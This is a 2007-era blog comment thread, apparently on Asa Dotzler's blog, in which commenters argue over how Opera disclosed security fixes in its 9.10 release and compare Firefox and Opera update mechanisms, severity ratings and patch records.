Asa Dotzler: Firefox and more

>> Failing to use the loudest microphone they have to reach their users in cases
>> involving user safety is simply unacceptable.

p.e. https://bugzilla.mozilla.org/show_bug.cgi?id=360493
p.e. http://forums.mozillazine.org/viewtopic.php?t=500994

Where is mozillas "loudest microphone"?? bugzilla?? mozillazine?? Of course every Fx user looks up these sources on a daily basis... Come one, that Opera dizzing is ridiculous!

I'm a proud Fx user, but I'm not proud of such behavior!

This release is a recommended security upgrade. See the Security section for additional information.

From the main page of Changelog for Opera 9.02 for Windows. So (sometimes) they let you know that an update is important.

On the other side, Mozilla Firefox 2.0.0.1 Release Notes says that there are some security issues but doesn't warn at first sight if it's a really critical update.

By the way, I don't see the difference between how Opera hides flaws and how Microsoft does it.

This isn't the first time Opera's done something like this. In 2005, there was a critical vulnerability in the Flash player included with Opera http://secunia.com/advisories/17437/. All Opera users had to do to protect themselves from this arbitrary code execution problem was to download the latest version of the Flash player. Opera employees waited for two weeks, during which time proof-of-concept exploit code became available, before finally saying something about the problem when Opera 8.51 was released with the updated Flash player http://my.opera.com/community/forums/topic.dml?id=111234 http://www.opera.com/docs/changelogs/windows/851/. It seems like Opera doesn't really care about users' security, but only wants it to appear as if Opera is secure by not mentioning vulnerabilities.

Funny, when I saw this on Slashdot, I *knew* Asa Dotzler will write about this.

Good one, Asa. First you come up with excuses for the huge number of security holes in Firefox, and you try to minimize the importance of those by pointing to Microsoft and how long it takes for them to patch theirs.

As if Microsoft's crappiness is an excuse for Mozilla's crappiness.

The other day, Opera was irrelevant because it has a better security track record than Mozilla (fewer holes, quicker patches).

Today, Opera is suddenly extremely relevant because Asa can bash it.

Rascal: So what is most important for you? Number of bugs or number of days you are in the risk?

If I'm in the risk in 9 days instead of 98 days I don't care if those 9 days is because of 1 bug or 1 million.

They key problem here is not the number of bugs, or the time it takes to fix them. That issue was dealt with in the previous post on this blog.

The issue here is that a critical update was not marked as critical. It was disguised as a generic update.

As a user, if you are prompted to download what seems to be a 'feature' update, then you might choose to ignore it.

If the update is marked as a critical security update, then you might choose to download it.

You need to be informed in order to make a decision. Therefore, pulling the wool over your eyes does not allow you to make that informed decision.

They needn't have gone into detail about what the security hole was. There are, I feel, times when it is better not to divulge the nature of a vulnerability.

Even so- it is imperative that people are told if the update is to plug a security hole, or to add yet another feature in an already bloated browser.

Pretty much everything I read about the Opera 9.10 release seemed to focus on the addition of fraud protection as a security feature. I wonder if someone in the PR department thought, "Oh, we're promoting this new security feature, that'll be enough to convince people they need to upgrade!"

A thoroughly unscientific survey of my own site's logs shows a 50/50 split between Opera 9.0x and 9.10... but there are still about 30% of Opera visitors using Opera 7 or 8. If security notices in earlier versions didn't convince them to upgrade, a notice on this one wouldn't have either.

@ Kelson

Agreed, many people will ignore the update even if it had "Critical- Update Now!!!" plastered all over it.

But at least they would be able to make that informed decision.

Consider this:
You're old and computers are some "new device" to you, you know how to use it, but you don't really understand how things work. E.g. your parents.
In most cases children maintain their parents PC and take care it doesn't send Spam after 2 month.
Opera never asked me to update, because a new version was released, although I greatly appreciate Opera for its superb download manager. Now, my parents don't know anything about updating. Except those "please wait while updates are installed" messages when they boot up their company PC. They'll never update Opera, unless it specifically asks them to (it doesn't even do that). And even then, it just redirects them to the download page and asks to download and & re-install it. Either they now call me, or just don't update.
In Firefox they have to click "Later" now and then - I printed this dialog out and placed it next to the PC. The next time they start Firefox up, it will show some progress bar, but start anyway.
Actually, Opera would be the browser of choice for my parents. They don't use extensions anyway, so why not use the faster (and probably more secure) Opera - because I don't want to have to regularly maintain my parents' PC. That's a huge advantage for Firefox and its probably the one thing that Opera lacks over Firefox.
I hope that one day Opera implements an update mechanism similar to Firefox. Please don't use this to start another flame war which browser's better.

when will this get fixed: http://secunia.com/advisories/23046/

a, that's an only moderate severity issue that experts agree needs to be addressed by the websites. (see myspace, for example, where they've already fixed the problem.) Any websites that allows for user content, like myspace, should disallow users from adding password fields and scripts. There are plenty of checks that these kinds of sites already do to prevent XSS including tag and attribute whitelists. Sites that allow users to include dangerous scripts, tags and attributes open their users to XSS attacks and this is no different.

What does this have to do with Opera's failure to inform their users of critical security flaws in their browser?

- A

The key problems are:

1 the number of bugs
2 the time it takes to fix them.

Mozilla fails miserably at #1, and that Microsoft sucks more than Mozilla at #2 does not excuse #1.

And Mozilla never fails to seize an opportunity to come up with excuses for its own security problems while at the same time bashing others. Just look at Asa's post the other day where he tried to make people ignore the fact that Firefox had more security holes than IE. When an official spokesperson does these kinds of things, one can but wonder what goes on behind closed doors...

What do you imagine goes on behind closed doors? Jesse tells Asa that Firefox has never had any security holes? David Baron and Brendan Eich are forced to stop fixing memory safety bugs and spend all their time adding new features instead? We plot to assassinate an independent security researcher who didn't give us 8 months to fix a bug?

You little Rascal!

How do you make someone ignore something?

I don't care what people say, I am sticking with Firefox.

reply from opera: http://my.opera.com/desktopteam/blog/show.dml/673073

Opera's response : http://my.opera.com/desktopteam/blog/show.dml/673073
Anyway, Firefox devs dont have the right to critisize opera as if you see secunia there are plenty of advisories that both Fx and MS IE have just ignored (their excuse being they are not important enough/critical enough). Opera has a 100% track record.

Opera's response : http://my.opera.com/desktopteam/blog/show.dml/673073
Anyway, Firefox devs dont have the right to critisize opera as if you see secunia there are plenty of advisories that both Fx and MS IE have just ignored (their excuse being they are not important enough/critical enough). Opera has a 100% track record.

Some thoughts on the Opera response

"Making the vulnerability public knowledge before a stable version fixes the issue would leave lots of users vulnerable."

- They didn't have to explain what the vulnerability is. Just telling people the update pertains to a security fix enables the user to decide if the fix is worth installing now.

"Serious reporters do not announce vulnerabilities before vendors have a fix in public builds"

- Alas, in the real world, the kind of people actually exploiting these vulnerabilities tend not to hold back their attacks until fixes are available

"So what you have been seeing with the 9.10 release and the delayed announcement of two vulnerabilities is an unhappy coincidence of the release and the Christmas vacation."

- I'm not sure this bears any influence at all over a decision to not notify users a security hole needs plugging.

"Happy new year to all, and enjoy safe browsing - and remember to upgrade to 9.10 if you haven't done so yet."

- OK, he totally lost me here. Firefox is only at version 2- nowhere near 9.10! ;-)

@lizard i think he was refering to opera, lol.

Lizzie writes:

"I'm not sure this bears any influence at all over a decision to not notify users a security hole needs plugging."

I'm not sure if you are deliberately being misleading here, but the quote you reply to clearly states that it was a mistake and not a deliberate decision to "hide" anything. Why would Opera suddenly start to "hide" stuff now, after more than ten years of not hiding security issues?

Mozilla fails miserably at [the number of bugs]
Any open project will fail here as they can't fix those without someone noticing. Closed projects on the other hand can (intentionally or not): http://my.opera.com/desktopteam/blog/2007/01/08/handling-security#comment2437906

Mozilla fails miserably at [the number of bugs]
Any open project will fail here as they can't fix those without someone noticing. Closed projects on the other hand can (intentionally or not): http://my.opera.com/desktopteam/blog/2007/01/08/handling-security#comment2437906

Mozilla fails miserably at [the number of bugs]
Any open project will fail here as they can't fix those without someone noticing. Closed projects on the other hand can (intentionally or not): http://my.opera.com/desktopteam/blog/2007/01/08/handling-security#comment2437906

Mowhawkie writes:

"I'm not sure if you are deliberately being misleading here, but the quote you reply to clearly states that it was a mistake and not a deliberate decision to "hide" anything"

I'm not sure if you are deliberately being misleading here, but I checked, re-checked, and checked again Opera's response. I find no mention of a mistake. In fact, here's the paragraph in question:

"It can happen that the severity of an exploit is upgraded by our internal security team at a later stage, since further analysis shows that the original severity was not accurate: our priority is to first fix the issue; further and deeper analysis happens even after that, and sometimes can rectify initial findings"

Which is fine. Absolutely fine. But it's not explaining why they pushed out an update that fixes a security hole, but didn't tell anyone it fixed a security hole.

The fact that they did afterwards (after all the hullaballo it seems), doesn't really answer why they didn't see fit to tell people in the first place.

I'll reiterate- they didn't need to provide details of the exploit. To just tell people that it covers a security issue is notice enough.

Mr Lizard : You got things mixed. The first report about these issues was made by Opera. Opera did not make them public after the security reporters

"Me" is correct. The article that started this whole controversy was written in response to Opera's release of two security advisories last Friday (coordinated with iDefense). It's right there in the opening paragraph of the article: "As Opera Software has announced in recent security notices..."

Hmmm.. the Heise article states Opera didn't mention it in their changelog

"The change log for Opera 9.10 does not contain any indication of these vulnerabilities in the section on security"

So I checked the changelog:

http://www.opera.com/docs/changelogs/windows/910/

At the time of writing, this stood out:

>Release Notes

>This release of Opera introduces Fraud Protection.

So I checked further down the page:

>Security

* New Fraud Protection feature (a phishing filter).
* Changed Wand data to a new format. The upgrade to this new format is not reversible.

This is the changelog, and it's still not here? So even now Opera have stated in a response, which you'd have to find if you wanted to read, that security holes got plugged, it's still not in the official changelog (which is the document people *will* read when deciding if the update is for them.

Hurray, they finally updated their changelog. On the other hand that doesn't help those that saw the update and (correctly) dismissed it because it only was a feature release...

Beep: And it doesn't help Firefox users that Mozilla hasn't fixed theyr open security issue. Wee.. Hypocrits

Lizzie is getting it all wrong yet again. Instead of allowing him to quote things that aren't relevant, let's quote this instead:

"So what you have been seeing with the 9.10 release and the delayed announcement of two vulnerabilities is an unhappy coincidence of the release and the Christmas vacation."

But Lizzie writes:

"But it's not explaining why they pushed out an update that fixes a security hole, but didn't tell anyone it fixed a security hole.

The fact that they did afterwards (after all the hullaballo it seems), doesn't really answer why they didn't see fit to tell people in the first place."

That's the point, Mr Lizard. It was a mistake. It should have been there, but it was "an unhappy coincidence of the release and the Christmas vacation".

It's fine that you try to make Opera look bad to make Mozilla look good the way Asa did the other day to come up with an excuse for Firefox security flaws outnumbering IE's. Unlike Asa, you are not a Mozilla spokesperson.

But when you're spreading misinformation even after being told what's going on, there's no excuse anymore.

Unless you work for Mozilla, in which case this kind of behavior would be expected :)

"At Mozilla, we've invested significant resources building a sophisticated automatic update mechanism that delivers security and stability updates to virtually all our tens of millions of users in less than 48 hours."

I'm not sure when this sophisticated system went into effect, but I've been one of the users left out of the automatic security updates in the recent past ('virtually all' is a good qualifier there). Many a time I've had to update manually after hearing of a Fx vulnerability through the grapevine.

If Mozilla's update mechanism is so "sophisticated", how come I had to upgrade to 2.0 manually?

Oh yeah, and it took far more than 48 hours for it to notify me for past releases.

sure no one from opera here is spreading fud about mozilla *rolleyes*

At least the Opera users here are just that - users. Asa is an official spokesperson for Mozilla.

Asa is an official spokesperson for Mozilla.
IIRC he has stated it before that he is not an official spokesperson and that this here is his personal blog.

That's the point, Mr Lizard. It was a mistake. It should have been there, but it was "an unhappy coincidence of the release and the Christmas vacation".
as someone said on the post over there "Which calls into question how serious Opera really is about security."

And it doesn't help Firefox users that Mozilla hasn't fixed [their] open security issue.
No, it doesn't help, but I don't see what's your point as the latest announced Firefox security release (2.0.0.1) only list one Less Critical security issue at secunia (see the comment from Asa above) and the latest announced Opera security release 9.02 has two Highly Critical issues listed. As stated above it won't help those users that Opera now has updated their changelog...

Beep:
You are wrong. The security issues in Opera are deemed moderate by Opera. The thing is Opera fixed their moderate security issues, while Mozilla has not and aand at the same time as Asa accuses Opera of downplaying security issues as secunia reports them as higher severy then Opera as downplaying the issues he also downplays a open security issue in Firefox... Difference: Open.. Fixed.. Days are counting folks....

Quote: "At Mozilla, we've"

We, we, we. That's Mozilla he's talking about. He works for Mozilla.

And a minor mistake with non-critical fixes does not call into question how serious Opera really is about security. Especially since iDefense wanted to wait with the announcement over Xmas (according to iDefense).

"Opera Software hides security vulnerabilities from their users, and from the public and the press."

So our knowledge about the security in applications is based on press releases from the makers of those apps? In that case, Microsoft could have a spotless rep.

Opera 9.10 has no unpatched vulnerabilities, from what I see. When Firefox has *no* unpatched vulnerabilities, whatever the severity, then we can have all the FUD we want. I've never admired that very much as a marketing tactic. It's one thing to "hide" security cracks; it's another to publicize them and do nothing about them.

That said, Firefox and Thunderbird are my defaults.

peeB, Opera made a mistake in announcing those vulnerabilities as non-critical. They were most certainly critical and could allow an attacker to fully compromise a user machine. Opera failed to let their warn their users when they shipped the new version, leading many users no doubt to believe that the new version wasn't a critical upgrade and when they did announce the vulnerabilities long after the product shipped they mis-labeled them as less severe than they actually were.

As I've already said, the minor vulnerability listed at Secunia is actually a website problem and not exclusively a browser problem. Major websites are fixing their sloppy coding to fix the problem.

Asa do you think Opera knows better then you the severtity of the security issues? Or are you saying browser vendors should blindly obey to the verdicts of the security organizations? When Mozilla disagrees with security reporters is Mozilla wrong then?
Now isn't it true that the only security issue here that has affected users is the only in Firefox where thousands of users got their passwords lost? Is it maybe abit convinient to blame web sites when you the browser vendor should be able to provide the user with the secure browser experience as you claim you do?

Accusing Opera of downplaying security issues and then brush of a open security issue in Firefox as web sites problem is not very tactical. Are you allowed to disagree with Secunia and not Opera?
Doesn't http://secunia.com/advisories/23046/ state:

"
A vulnerability has been discovered in Firefox, which can be exploited by malicious people to conduct phishing attacks."

Now this is a open security issue in Firefox, Opera fixed theirs.. Maybe you should stop attacking when confronted with your poorer security records..

And btw haven't Mozilla also made mistakes in the past??
http://weblogs.mozillazine.org/schrep/archives/2006/02/security_and_vulnerability_rat_1.html

doh, you clearly don't understand security issues and severity.

A vulnerability that allows an attacker to inject code into the stack after a buffer overrun allows the attacker to own that machine. A vulnerability like that which can be triggered by content on a website means that anyone who visits an evil site can lose not only all of the contents of their personal machine, but their machine can be infected with spyware and viruses that use that poor user's machine as an attack launch point against other people and machines. This is a critical vulnerability, no matter what a browser vendor claims. Opera was wrong to not tell their users to upgrade to avoid this critical vulnerability. Then they were wrong to claim it wasn't that severe. They've admitted as much.

A bug which allows one member of a site to steal another member's password and so impersonate them is a serious issue but it effects only the information available on that site and not a users entire machine and all the data on that machine. In the case of this issue, we believe that it is something that should be corrected by websites. Websites can do all kinds of stupid things to leave their users unsafe. A website could publish all of their user passwords on their front page and that's not a browser's fault. When all is said and done, a browser can do some things to try to make it easier for websites to do fewer stupid things, but this is an issue that must be addressed by sites because it is a site code issue. And they are. The major sites who had this unfortunate flaw have fixed their sites.

So, which is severe and which is moderate.

First, you have an attack that gives the bad guys your entire machine and all of the passwords for every site where you and every member of your family are members, all of your personal files and those of every member of your family who shares my machine, including potentially, financial statements with credit card info, medical history, school records, all of your family's private or work emails, etc -- AND that can leave a virus on your machine that sends the bad guys every keystroke you make from that point forward so they can steal any future information you ever put on your computer or input into any website or receive in any email or IM, and can then use your machine to attack other machines through email worms or distributed denial of service attacks on large-scale private or public infrastructure.

Second, you have an attack where bad guys at a few social websites (websites that foolishly allow their users to add evil content to the pages, when good web development practices would require they block that evil content) for a short period of time were able to steal your login to that one social website.

OK. One of those is a critical browser flaw that cannot be fixed by anyone other than the browser maker and one is a moderate flaw that results from bad website coding practices and can easily be fixed at the website.

That's the situation you have here. If the situation was reversed, I'd be defending Opera or Safari or even IE and saying that websites need to not do stupid things that compromise their users and that Mozilla needs to fix any critical browser vulnerabilities.

I'm not attacking anyone here. I'm simply calling out a failure to protect users and if I see Mozilla taking steps to avoid bad press which are causing users to be at serious risk, I'll say so.

- A

"As I've already said, the minor vulnerability listed at Secunia is actually a website problem and not exclusively a browser problem. Major websites are fixing their sloppy coding to fix the problem."

I don't quite understand. If it's a website problem, does it affect all other browsers, or only Firefox?

FYI, Only Firefox (Internet Explorer partially affected, OPERA NOT AFFECTED)

@Monster Max:

If Mozilla's update mechanism is so "sophisticated", how come I had to upgrade to 2.0 manually?

Because it's being used for security updates. If you'd stayed with Firefox 1.5, you would have been automatically updated to 1.5.0.9 by now.

Asa, don't blame doh to "clearly don't understand security issues and severity." if you are the one who doesn't.

You say "A vulnerability that allows an attacker to inject code into the stack after a buffer overrun allows the attacker to own that machine.", and that's right. Thing is, both vulnerabilities in Opera are *heap* buffer problems, only to be exploited through misguided virtual function calls, the *stack* stays entirely intact. This means that a technique called "heap spraying" has to be used to fill up your *entire memory* with code snippets and hope that the execution ends up there. That spraying is possible with Javascript, BUT

1. it takes quite a while, so the exploit becomes quite noticable
2. it only works if you're "lucky", most times it will just crash and nothing more.

I have working exploit code for both vulnerabilities, and in my (admittedly statistically not all too significant, but after all real life) tests they succeeded in between 1 in 1000 and 1 in 10000 cases. WOW. So who's downplaying/uphyping issues here, eh?

"Opera made a mistake in announcing those vulnerabilities as non-critical. They were most certainly critical and could allow an attacker to fully compromise a user machine."

You are an ignorant fool, Ass-a. Mozilla should be ashamed to have an official spokesperson like you. What the hell is wrong with PR at Mozilla? Why do they allow you, a rabid and lying troll, to be their face to the world?

"As I've already said, the minor vulnerability listed at Secunia is actually a website problem and not exclusively a browser problem."

Another lame excuse.

Notice how Ass-a is downplaying security flaws in Firefox while pretending to know more about Opera than Opera Software when determining the severity of an Opera flaw.

Disgraceful. Simply disgraceful.

Ouch... This little bullet sure backfired at Asa :-)

apologies for the mistype. s/stack/heap. This is still a remote exploit that can own a machine. Whether 1 in 10 are actually exploited or 1 in 10,000 are, there can be no doubt that this is a critical flaw.

Exploiter, what you're saying is that if I posted your exploit (and I'm assuming you're also willing to admit the possibility that someone could craft a more effective attack, right?) on this lonely little weblog, which only gets between 7,000 and 10,000 views a day, after the last week or so where about (abnormally) 25% of my visitors are Opera users and about 5% of my visitors were using an un-patched version of Opera (yielding about 3,500 views by unpatched Opera users,) I could today probably own at least one of them.

Now, take a site with real traffic, like a warez site with hundreds of thousands of daily views or even millions and you're talking about large numbers of Opera users being vulnerable and many of them actually being successfully exploited.

Some of this is mitigated by the fact that there aren't that many Opera users, but that's no excuse for Opera not doing everything in their power to keep those users safe.

- A

"that's no excuse for Opera not doing everything in their power to keep those users safe."

Isn't that the reason why Opera has 0 unpatched security advisories?... Wonder whether the FF record is as good...

golliwogg, patching a flaw and actually delivering that patch to all of your users are two different things. I commend Opera on fixing flaws. I think it's great. Nowhere here have I said they did a bad job fixing these flaws. From what I can tell, they did a great job and the turnaround was darned quick.

I'm critical of Opera not because of anything to do with their fix. I'm critical because they failed to let their users know how important it was for all of them to upgrade to the latest fixed version. Unlike Firefox, Opera does not have a way to ensure that all of their users upgrade. They can tell the users with an update notice in the client that a new version is available and they can announce it loudly in the press and on their websites. What Opera failed to do was utilize these two contact points with their users to express how important it was to upgrade. They treated the release as a feature update and many of their users didn't update because they didn't feel that it was that important to get the new features. If Opera had used the client notification and the announcements on their homepage and in the press to say "All Opera users are urged to upgrade to get critical security fixes" rather than essentially "We've got some new features for you" then a lot more Opera users would be protected today. They didn't do that and that's why I'm critical.

And Disgracasa continues his pathetic lies. He now pretends that Opera did this on purpose, the way this Mozilla spokesperson purposely repeatedly lies about Opera in his blog.

And once again he pretends to know better than Opera how severe security issues are, while at the same time making up excuses for wide open security holes in his own product.

"Unlike Firefox, Opera does not have a way to ensure that all of their users upgrade."

Yeah, fair enough: Opera does have an automatic notification system of updates, but no automatic update mechanism.

"If [...] then a lot more Opera users would be protected today."

No - would have been protected *over Christmas*, when the vulnerabilities were undiscolsed (and hence maybe known only to Exploiter?). I guess by now even my grandmother knows there was a security upgrade in 9.10 :) - and I guess that is also thanks to the noise you raised. Maybe Opera should look into hiring you for their community-information stunts?

"They didn't do that and that's why I'm critical."

Or maybe rather a bit over-zealous in putting Opera into a bad light? After all, it seems that these things do not only happen to Opera, but have happened to Mozilla as well ( http://weblogs.mozillazine.org/schrep/archives/2006/02/security_and_vulnerability_rat_1.html ) - back in the days when Firefox didn't have an automatic update mechanism (or does my memory fail me here?)...

golliwogg, you're part right. A year ago we made a mistake in classifying one of our fixed flaws, but the release was still a critical release because there was another serious flaw patched and a couple of less serious flaws patched. So mis-classifying one did not change our approach to the release. Had it been the only flaw we were patching or had we made the mistake in classification across all of the flaws we patched and disclosed, then the consequences might have been a little bit worse, but not that much worse, because it was also mitigated by the fact that yes, we did have our automatic update system starting with Firefox 1.5 (so it was in place for 1.5.0.1 forward) and all of our users received that automatic update. Reporting the flaw was not our only opportunity to convince users to update, the update was automatic.

If Opera had an automatic syatem like Mozilla or Microsoft (or Apple or dozens of other companies and products on the web) then I wouldn't have had much to say about their latest security release.

- A

"If Opera had an automatic syatem [...] then I wouldn't have had much to say about their latest security release."

It's always difficult to say what would have happened "if"... :) But well, the important bit is to make sure all users *can* update to a safe product after all, isn't it?

May I take the chance to ask why the Firefox vulnerability mentioned a few times already here (and you can't be serious when making *websites* responsible for that password disclosure, can you?) hasn't been taken care of yet?

Asa
Thanks for the evading reply and long lecture about the basic of what can happen when a file is installed on a computer, now I feel like I know soo much more about security *yawn*
It's obvious you have higher criterias for Opera when it comes to security. We all expect more of them, and the reason is they are simply better..
Now instead of lying

"Then they were wrong to claim it wasn't that severe. They've admitted as much."

http://www.internetnews.com/dev-news/article.php/3653226

please consider next time someone makes a mistake to give them the benefit of doubt. I can't se any Opera people attacking Mozilla when they did some misjudgements about security issues in Firefox 1.5.03

I somehow don't se you as the correct moral compass �with your skewed points and arguments. You are clearly not able to make anyone understand why you attack them so harshly..

Remember people make mistakes, but the biggest mistake one can do is to not give anyone the benefit of doubt or someone might return the favor

Asa have a safe weekend using Opera away from work. We all know you like the safe feeling it gives you ;-)

A quick note about commenting. I was just looking over the comments here, and there were at least two (maybe three) people posting under different names and email addresses. On a contentions discussion thread like this one, that begins to look an awful lot like sockpuppetry.

Since I didn't catch it early and post this warning, I'm not going to delete comments here, but going forward, please use the same name or email so you fairly represent yourself and so others know they're addressing one person and not several.

If I see continued multiple postings from the same person using different names, I'm going to delete them and ban the commenter. Thanks for helping to keep the discussion sane.

- A

"If Opera had used the client notification and the announcements on their homepage and in the press to say "All Opera users are urged to upgrade to get critical security fixes" rather than essentially "We've got some new features for you" then a lot more Opera users would be protected today."

The fact is, when I use Opera 9.10 *today*, I'm more secure than I am when using Firefox 2.0.0.1, right?

The point being, as I said above, Mozilla should ensure that all their own ducks are in a row when it comes to security flaws before going after Opera. It never ceases to amaze me that a browser with a 1% market share (as Mozilla spokesmen and less temperate fans are always quick to point out) should attract so much of Mozilla's attention, or should haunt their thoughts, apparently. ;)

anon, that's hard to say. Honestly. I suspect they're roughly equivalent. I can't think of any serious vulnerabilities in either browser if the user is fully up to date. The problem is the users who aren't up to date.

You and I are able to keep ourselves safe. It's the "regular users" out there who need the most help from the browser vendors and right now, as far as I can tell, they are being better supported by Firefox than Opera. Firefox has the technology to keep all of its users up to date and Opera doesn't. That's not a slam, it's just the state of things when it comes to browsers. IE has a better system in place than Opera to keep their users up to date. So does Apple with Safari. Because Opera is behind the mainstream browsers in this area, it is really incumbent upon them to do two things. First, they need to use whatever tools they have today to get users to upgrade to their latest secure versions. Not doing everything in their power to get those Opera 7, 8, and 9.0 users to update means they're failing those users when it comes to keeping them safe. Second, Opera needs to spend whatever resources it takes to build an automatic update system for their products. Web browser makers today simply cannot afford to leave so many users at risk. Firefox, IE, and Safari all have such a system and Opera doesn't.

- A

"anon, that's hard to say. Honestly. I suspect they're roughly equivalent. I can't think of any serious vulnerabilities in either browser if the user is fully up to date. The problem is the users who aren't up to date."

I agree with that.

"Second, Opera needs to spend whatever resources it takes to build an automatic update system for their products."

Whoeheartedly agree with that as well. There's no excuse for Opera not having implemented an auto-update, auto-install mechanism. That should've been done long before the widgets and BitTorrent thing.

Ha ha... It's fuuny childish argument. There's no need to argue. And everyone can play over web with his/her own fav browser. There will be no time all people in world use the same browser. So what is the point of this war? To show Firefox is better or Opera maybe? Are you adults here?

Firefox is good browser but i keep using opera cause i feel more relax with it over web. While I respect to both Firefix people and Mozilla itself. An this is what most of opera fans follow. Sorry to say but It's not true about Firefox people. They're always in war. anyway it was always like this. Open source communities attacking none open source ones for some odd odd reasons.

cheers.

Just to help:

if you want to check you're using the most current version of Opera:

Help [on the menu bar] > Check for updates

Asa:

Why are you even writing about this though? Surely there's enough about Firefox [which is a great browser, by the way] and Mozilla to write about without having to be negative about something else? You could be commenting on any of the many products that Mozilla makes and providing proper and dare I say, ORIGINAL news. But instead you choose to re-hash. I am startled by the lack of information and thinly disguised bile you distribute sometimes.

And how come every time you "start a debate" it always boils down to "yah boo sucks, we're great and you're not"? You might not be a Mozilla spokesperson, but through the fires you start you do them more harm than good anyway, and so that may be a good thing for them.

Please stop writing.

The security issues in Opera are deemed moderate by Opera.
Yes, deemed moderate by Opera, but critical most others.

The thing is Opera fixed their moderate security issues, while Mozilla has not and aand at the same time as Asa accuses Opera of downplaying security issues as secunia reports them as higher severy then Opera as downplaying the issues he also downplays a open security issue in Firefox.
If the two Opera issues were only Moderately Critical than the Firefox issue is Not Critical at all going by secunia...

We, we, we. That's Mozilla he's talking about. He works for Mozilla.
Sure he does, but working for someone doesn't automatically makes you a spokesperson... Also I noted that it might be incorrect...

Opera 9.10 has no unpatched vulnerabilities, from what I see.
An no one claimed, from what I see. But you can be assured that many Opera users (even security hardliners) will think the same applies to Opera 9.02 because the changelog they read indicated that there were no security fixes.

Is it maybe abit convinient to blame web sites [...]
It is the web sites fault if they allow users to modify their website to make things they should not have been able to.

" 'We, we, we. That's Mozilla he's talking about. He works for Mozilla.'
Sure he does, but working for someone doesn't automatically makes you a spokesperson... Also I noted that it might be incorrect..."

No, but if one is a Mozilla employee, and one makes pronouncements about Firefox and competing browsers, it gives one's words more weight than, say, the ordinary end user.

" 'Opera 9.10 has no unpatched vulnerabilities, from what I see.'
An no one claimed, from what I see. But you can be assured that many Opera users (even security hardliners) will think the same applies to Opera 9.02 because the changelog they read indicated that there were no security fixes."

Security hard-liners would know well enough to upgrade to a new version at the first opportunity.

" 'The thing is Opera fixed their moderate security issues, while Mozilla has not and aand at the same time as Asa accuses Opera of downplaying security issues as secunia reports them as higher severy then Opera as downplaying the issues he also downplays a open security issue in Firefox.'
If the two Opera issues were only Moderately Critical than the Firefox issue is Not Critical at all going by secunia..."

And oh yeah, the point was that whatever the severity of the vulnerability in Firefox, it's STILL THERE. And if it's a website issue, it would appear to me that it would run across the whole spectrum of browsers out there.

anon, actually it is a website issue and with very little additional social engineering, that bug can bite both IE and Opera. You really should read up a bit more on it before you spout off. The website flaw is more easily taken advantage of in Firefox than in IE or Opera, but it's still there in all of them.

Actually, it's even trickier to exploit it in Opera because the Wand is interactive. Firefox and (IIRC) IE will auto-fill saved login/passwords when you land on the page, while Opera won't do so until you click on a toolbar button.

FWIW, Opera mentioned changes in the format used to save wand data between 9.0x and 9.10. I assumed they were related to this issue.

Erg. Meant to mention that, given social engineering, one could convince the user to click on the wand, maybe with a fake session timeout page or something.

Kelson, I'm not sure what that wand data format change was. Unfortunately, I cannot investigate like I could with Mozilla where we have an open and transparent system.

You are right, it would be a bit more difficult to exploit in Opera than the other browsers, but it could still be done.

Ultimately though, this problem is the result of unsound development practices on sites that allow user generated content. They are failing to properly filter that content. Sites are learning, though, just as they learned years ago to filter inline scripts. (Would those advocating we fix this website flaw in Firefox have preferred if browser makers had removed support for inline scripts a few years back rather than putting that burden on webmasters that host user generated content?)

As Jesse explained nearly two months ago, the right solution was for myspace and similar sites to disallow input type="password" in user-generated content, the same way they disallow inline scripts and other hazards. Myspace agreed and fixed their site. Other sites with this problem are following suit.

Now, browser vendors can add features to help mitigate problems that arise from bad website coding practices, and they often do, (see the dependencies here) but that does not mean that the problem lies with the browser, it just means that we're all in this together trying to do best by the user.

I'm going to say it again, though. The posts I've made here aren't about how quickly fixed or how many security problems any browser has. That's a different argument and bringing it up here rather than discussing the actual contents of my posts is simply off-topic.
- A

If it can be exploited in a FF or IE Browser, but not in an Opera Browser, is it really the website's fault?

Whatever your answer is, that answer also applies to all other issues sites/users are "experiencing" with Opera.

For me, it was clear as hell that 9.1 would bring security fixes with it... they are ALWAYS fixing bugs and holes, even if they WERE NOT reported BY ANYONE, so does it make sense to include the sentence "contains the usual chunk of security and stability fixes" if every user knows that anyways?

Grah, the password issue can be exploited in any browser that stores passwords and offers a filling mechanism to the user. It takes varying degrees of social engineering depending on whether it's IE, Safari, or Opera, but all could be vulnerable with some fairly simple tricks. Firefox could change its implementation to be just like any of IE's, Safari's, or Opera's and users would still not be protected from this problem. The problem is that websites that allow user generated countent should not be allowing password forms. There's just no reason to allow it and a lot of reason to disallow it like they do other features (inline scripts, etc.)

As for your suggestion that every user knows that every update contains security updates, I'd wager that either you didn't think that through or you have no idea how little the overwhelming majority of computer users actually understand.

- A

>>anon, actually it is a website issue and with very little additional social engineering, that bug can bite both IE and Opera. You really should read up a bit more on it before you spout off.

I'm not spouting off. I said "it appears to me".

>>Today I came across a short article at Heise Security that might go some way toward explaining why Opera flaws aren't discussed in the same way that flaws in the mainstream browsers, Firefox and IE, are.

Opera Software hides security vulnerabilities from their users, and from the public and the press.

Oops, sorry. Part of my comment in the above post got cut off. Anyway:

"Today I came across a short article at Heise Security that might go some way toward explaining why Opera flaws aren't discussed in the same way that flaws in the mainstream browsers, Firefox and IE, are.

Opera Software hides security vulnerabilities from their users, and from the public and the press."

Now *that* could be considered "spouting off". That little snippet cleverly suggests that the good Opera security record of the past might well have all been an illusion. I am a Mozilla fan, I use Mozilla products daily. But my affection for Mozilla doesn't erase my affection for *fairness*. You do raise some completely valid points though regarding Opera's lack of an auto-update mechanism, but then the original blog entry could have been framed differently to reflect that, and not attempts at FUD.

I am a bit baffled by Asa's story and I am still trying to understand why he tried to exploit an issue in order to lure the 1-2% Opera users to FireFox. Are things going that bad for FireFox nowadays? Isn't there a browser with a bigger market share to target? First of all, how many common people read changelogs? I don't. I don't care for them, because most of it is hocus pocus and impossible for me to verify. I just have to trust a company that they have done it. Just like Weird Al sang in Fat: "I am so fat that when I get a shoe shine, I have to take their word" . Just as you had to trust Heise in order to form 'your' opinion in order to downplay Opera.

Would an automatic update service make your browser safer? That depends: do I trust the vendor that they really have properly fixed the issues and in the process have not created other ones? In Opera I can also check for new updates, but mostly I just frequently, like most Opera users, check their website. Opera and FireFox users have in common that they are quite savvy and up-to-date, but since FireFox is getting a bigger marketshare, they must think of the "dummies" out there. Opera does not have that problem yet and I don't think it will ever come that far, because the desktop is not Opera's main market. Coming back to trusting a company. Who do you trust more: Opera or Mozilla. I go for Opera, because of their security record, their involvement in the community, the fact that they are company with a long and good history, their reputation and, since now, the fact that they do not use blogs in order to make other browsers look silly in order to promote their own.

